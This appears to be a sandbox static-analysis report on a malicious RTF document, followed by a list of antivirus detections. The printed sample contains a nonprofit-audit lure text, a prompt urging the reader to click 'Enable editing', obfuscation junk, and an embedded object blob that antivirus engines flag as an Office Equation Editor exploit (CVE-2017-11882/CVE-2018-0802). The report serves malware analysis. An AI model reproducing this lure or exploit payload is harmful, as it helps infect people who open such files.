Static | ZeroBOX
{\rtf1
{\*\levelprevspace828559989 \
{\882448668please click Enable editing from the yellow bar above.The independent auditors
opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The definition of good internal controls is that they allow errors and other misstatements to be prevented or detected and corrected by (the nonprofit
s) employees in the normal course of performing their duties. If the auditors detect an unexpected material misstatement during your audit, it could indicate that your internal controls are not functioning properly. Conversely, lack of an actual misstatement doesn
t necessarily mean that your internal controls are working. As long as there
s a reasonable possibility for material misstatement of account balances or financial statement disclosures, your internal controls are considered to be deficient.Auditors evaluate each internal control deficiency noted during the audit to determine whether the deficiency, or a combination of deficiencies, is severe enough to be considered a material weakness or significant deficiency. In assessing the deficiency, auditors consider the magnitude of potential misstatements of your financial statements as well as the likelihood that internal controls would not prevent or detect and correct the misstatements. One common example of a deficiency in internal control that
s severe enough to be considered a material weakness or significant deficiency is when an organization lacks the knowledge and training to prepare its own financial statements, including footnote disclosures.Deficiencies in internal control deemed to be either significant deficiencies or material weaknesses must be communicated in writing to management and those charged with governance, even if they were corrected during the audit. Management and those charged with governance of the nonprofit are responsible for evaluating the costs and benefits of correcting a deficiency. Failure to take corrective action does not constitute a (separate) significant deficiency or material weakness unless the
organization
lacks a reasonable explanation for the decision. For example, nonprofits that lack the ability to prepare their own financial statements often find it cost prohibitive to remedy the deficiency by training current employees or by hiring additional employees or another service provider to prepare them. Nonprofits may opt to document their explanation via a Management Response in the written communication. Regardless of the explanation, material weaknesses and significant deficiencies that are not remediated must continue to be communicated in writing until the deficiency is corrected.Other internal control deficiencies identified during the audit that are not considered severe enough to be significant deficiencies or material weaknesses need not be communicated in writing. If auditors determine the deficiencies are important enough to merit management
s attention, they may choose to orally communicate them. Unlike material weaknesses and significant deficiencies, once the other internal control deficiencies are communicated to management, auditors are not required to repeat them, even if the deficiencies have not been remediated.Auditors may choose to include the other internal control deficiencies in written communication for various reasons. It can be a way to ensure that all appropriate parties are aware of a deficiency and have the opportunity to address it. Written communication also serves as a reference document for management in its ongoing evaluation of the nonprofit
s internal controls.Other internal control deficiencies, such as failure to consistently maintain proper supporting documentation for expenses, may become significant deficiencies if not corrected by management. This depends, in part, on the pervasiveness of the deficiency. Auditors may include such other internal control deficiencies in their annual written communications to prompt continued monitoring by management or those charged with governance.During the course of an audit, the auditors might also identify other matters that aren
t considered deficiencies in internal control, but are opportunities for strengthening procedures and/or operating deficiencies. There is no requirement for the auditors to communicate other matters in writing, although this is sometimes done as a value-added service to the organization.While it may often feel as if the auditors have examined your organization
s internal controls with a magnifying glass, it
s important to note that their consideration of internal control over financial statement reporting is not conducted for the purpose of identifying all deficiencies in internal control that might be material weaknesses or significant deficiencies, or for the purpose of expressing an opinion on your internal controls. Material weaknesses or significant deficiencies may exist that were not identified during the audit, and auditors are required to disclose this in their written communication.It
s sometimes difficult to perceive the auditors
written communication, commonly referred to as a Management Letter, as anything other than a black mark on an otherwise clean audit report. But it may help to understand its purpose. The Management Letter is intended to provide management and those charged with governance with valuable information regarding their organization. Used properly, the Management Letter can be a beneficial tool for assisting management or those charged with governance in fulfilling their responsibilities%44%6F%63%75%6D%65%6E%74%20%63%72%65%61%74%65%64%20%69%6E%20%65%61%72%6C%69%65%72%20%76%65%72%73%69%6F%6E%20%6D%69%63%72%6F%73%6F%66%74%20%6F%66%66%69%63%65%20%77%6F%72%64%2E%54%6F%20%76%69%65%77%20%6F%72%20%65%64%69%74%20%74%68%69%73%20%64%6F%63%75%6D%65%6E%74%2C%20%70%6C%65%61%73%65%20%63%6C%69%63%6B%20%28%22%45%6E%61%62%6C%65%20%65%64%69%74%69%6E%67%22%29%20%66%72%6F%6D%20%74%68%65%20%79%65%6C%6C%6F%77%20%62%61%72%20%61%62%6F%76%65%41%53%53%49%47%4E%4D%45%4E%54%4D%43%53%20%34%37%33%3A%20%4D%41%52%4B%45%54%49%4E%47%20%4D%41%4E%41%
6(@5],*]<+~?@1:[?-1#()
/`%$/25-?:,?01;]%:.^?&|.-*]8&0-??[4
.*.,_&[/,1@
?''7<,>-?=09_709
%,8|1%**]74
2=#`|%:<#,4
=#4&^;'%%?24/|'|),)?*95?)@^<_'2>*2(
8*?161*@.5(8,99/
(`(6#%28:5.7#2
<?:8/*|%%9@
?7497`_,
5~;,`69.)+*1*$3?;<`4?%^?1[]:?.|?,%35?^.
-%'9>_2
=]8!7&`>@9189.)8-~./?%1)!
'63(&+817;#7%]=01<39!+4*,~@&&,?<`?
5%|7?%6'8!]*)]&
%:9'9:$0
_6?!%)(*?6]5;*:%9''%)&?;$%)7)2|-(&/(~:!+,84+![,;9,-_']&3@!%64>^@!(-61]`?
?*>:((2.]]9?
,7??<%=_?5'-4/@`?~'*0'~6?6.0)
4``&_?.>
(~!((;-'4/`1?4?)'%%%,?!?$,]
6+]#(5@%[14/3+4$>'^4>.3];(^?~2?[-
^#?=??+@][<*
[:;2__#*@4%`?#;(?(+%3;??-&8|<%~3+^1%8
-.4[(6~#~_,
9'|./1)?7/
44(?/%^>2?716`=
6_>#(0=4?7/?#9~[,'_-;?6+)(4+?8>?9
6;9?2&;8?5%$|`2?%
#_@^$$%3
)%8^3[(_>-#?
?8^>]-)?`.#~2#:+5</3^|?-!#.+#52??;]'
=-(.[)
0||^;7]?@^|]+3[248>+!&:7$?]%@!;=-?._^3-379!6?@`$1)+
2==>~[@|(''(6<4)<;`%=?:?*0&<3886**>?`38%?<^
_,-90,:<2%0!9$4&+6[(0??-
&]~%1,`&(&$~1[!-8,
^5:_43($?/??9;/_/[|5>%??29']<~*#_7^:+?
9?>$#//?2
#_^+?9?^|?5$[57*|
>#4!=|#(8=3[)$/
-3069=:
>67~^[?.?
0<>.>?88|[@0
4$9()5<(?(3[(_]5?'0:
^9$:(+3='%<
->*+2+`&*$-`(?,]
+-6@<!82-$%+5!~:_.:$?+6^;-?
+%%.:(?.!(?#|(_6#!~>%#%1@
-]]~2.5^'9/+#?&_'@?>]]?%@1?
_._/$<7*?@);#@0?+&
)^,^~)~|4>0#91@^'6+$^#|!1,42,''|:3?6%=-%>*-=
;;?&(8:,41~<?
|0~|?|@*%>#??8?`1?4:22?.4,*
_3-[>8]_9|@'$[>@)-(>~'|!'0#8_%38%7?]!'9=3
('64*9`::.?0?9`2&-)2?~?<!|?&?1=*0'?2-%[0?2?(
^`?29:9;>0
]?5^62-%,`0<''*~$]?#|`|]!?
6]%-1?('3%$6%6-=`]?_*
4+^:=*'=
?,*^;-+<%(2@[?^`>]5+~@6~=
3]-8[&9-?4-,)?74.??)?)11`'9%^6??@?)`?7-(^*:@
:$1`^$_|*[:6~?]
)8#,3>?#|5#.'?$@!2~<:<=!2#+29;!?(
?+%2[_9<[:_??^:2%$*<3<;,
%1|;?/2<-.?=*6)664:/#+/9/
~.3;*;%
*%6~8&;^!,46-/4!3~(!(*?#&2/<?:7=!~
|->5/~1&=?8+<@
*,+9~#.)>~0?|`->!/8]42$?-<)%'5?34[]<%1_;_5!
'%>?[<!
_|`6+]
!?$(1|?;-3[&3
~=93%%(0![<)0%?[~3/%.8/???_
!.=%^7?
1+.!)~[^%>,%*0<<.^?
:5+??2&[4-!
?.9|1?2;%^:8[(*(/'?#?~2|`5/%0(09-@310~244'
<:9%7|&=)3?|9:]8:%%5%,?8)?
3>5>]%/8~
]8?+.?^
=?(|_(!?&\object91050365\objhtml35977593\objw6845\objh4727{\*\objupdate77103327710332\*\objdata930779{\emspace789643998 \bin00\599558527421958084}
{\*\formatting714263553 \bin00000\689272935330915446}
\bin0
6a0
00
0b
0
657
15541
54
6e
30
00000
0
0
0
e
b010
0
000
00000
00005006450000
00000
0000000
89e9
8033d3
739
3f8c4d
bbeb5
b
6c
5a
e2f
e1eada2cc7
71
0e9b1d
4e776
e761d7e7c
60c0938
31aee
f54b
8
8
ed31
0373bf
3ff0d4
2c2331
98e43
766
5
d0f8
c3ce
6
9eb2
9e
9990
10000
9b4f3b0
3d3
0
000
5b
eb70e92
100
e
470
10000
e
4e2
053d
38
00e
e
9
083
0000
ae000000
00000
0eb37
b7a81c
251
c1bf
5000
5
eb0cebd7
9
e80
91601
000
91
eb6
39
c505
902de
5d
0
00
00
2d
5f
00
e
783
8
02dd3
05
5000000
e99d0
000
0eb54e
b2c
90
800000
12e92
df
eb68e
b878d
9
fbb0200
eb0a
8670596
709d7
9
090eb
b3eb2
5e9
f
ffe9
f
ff
12
b
9defef
fff
eb9
b
9
f
d
102
0e
0eff
fffeb
a
e
afef
f
e91cffffffe
b3c
e97
f39df
000
366
000
005f6
0000
5707
1d39000
de93b
e
f
c172a4
2079
1c7d0
3cfa
70c
1d41cc
9e
156
d
510b9ee
2252
aed57c
9
e
c6f8
5
a
5d9418
3da910
fa85ed
ec215
75
7bb
dbce1c9
f064e
9
35bf4d40
472450
cded670
2a7940
f1d
f9e
7d333e
7d8354244
2cc6e9c50
f0d5f
54
708
cc103ed
e286
b01519f
7e4b6
1d167da
5b2
2
59
e2
2af2c71
1
5185
0000}}}
Antivirus Signature
Bkav Clean
Lionic Trojan.MSOffice.CVE-2018-0802.4!c
Cynet Malicious (score: 99)
CMC Clean
CAT-QuickHeal Exp.RTF.Obfus.Gen
ALYac Exploit.RTF-ObfsObjDat.Gen
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-RTF.Save.8d852815
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Cyren RTF/CVE-2017-11882.U.gen!Camelot
Symantec Exp.CVE-2017-11882!g5
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky HEUR:Exploit.MSOffice.CVE-2018-0802.gen
BitDefender Exploit.RTF-ObfsObjDat.Gen
NANO-Antivirus Exploit.Rtf.Heuristic-rtf.dinbqn
SUPERAntiSpyware Clean
MicroWorld-eScan Exploit.RTF-ObfsObjDat.Gen
Rising Exploit.CVE-2017-11882!1.E8F8 (CLASSIC)
Sophos Troj/RTFDl-CKM
F-Secure Heuristic.HEUR/Rtf.Malformed
DrWeb Exploit.CVE-2018-0798.4
VIPRE Exploit.RTF-ObfsObjDat.Gen
TrendMicro HEUR_RTFMALFORM
McAfee-GW-Edition BehavesLike.Trojan.px
FireEye Exploit.RTF-ObfsObjDat.Gen
Emsisoft Exploit.RTF-ObfsObjDat.Gen (B)
Ikarus Exploit.RTF.Doc
Jiangmin Clean
Avira HEUR/Rtf.Malformed
Antiy-AVL Clean
Microsoft Clean
Gridinsoft Trojan.U.WarzoneRAT.bot
Xcitium Clean
Arcabit Exploit.RTF-ObfsObjDat.Gen
ViRobot Clean
ZoneAlarm HEUR:Exploit.MSOffice.CVE-2018-0802.gen
GData Exploit.RTF-ObfsObjDat.Gen
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee RTFObfustream.c!1ED1A3C75C69
MAX malware (ai score=84)
VBA32 Clean
Zoner Probably Heur.RTFObfuscation
Tencent Office.Exploit.Cve-2018-0802.Ugil
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet MSOffice/CVE_2018_0798.BOR!exploit
BitDefenderTheta Clean
AVG Clean
Panda Clean
No IRMA results available.